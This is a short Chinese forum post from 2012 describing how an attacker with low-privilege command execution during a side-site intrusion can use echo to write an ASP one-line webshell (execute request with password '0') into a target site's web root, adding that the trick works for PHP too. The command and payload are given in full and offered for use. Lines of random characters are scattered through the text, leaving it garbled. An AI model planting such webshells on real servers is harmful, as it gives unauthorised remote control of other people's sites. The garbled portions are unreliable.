在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。; F6 v8 p. Z9 C. i8 g) E( ?6 v
( `% o1 U/ E/ }0 L
命令格式( e$ _" ]0 i% @5 H- j2 x* w9 }
1 ]* Y4 L4 a6 J! L) w1 P
Echo 语句 >目标站绝对目录
7 W. C+ Z! R$ Z; W9 v# T5 D2 O5 k( q4 G; F6 t; d/ v8 x- p! d
例如:
, s6 I6 _5 s& S+ K) t' c1 R
9 S6 L! M; z2 j* A( F* \' _echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp2 \& ~/ w$ Z7 r& `+ z
3 r3 G2 _# P( m# q3 b Q
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
" O8 D. C0 r& G |
发表于 2012-9-23 14:40:24
收藏
支持
反对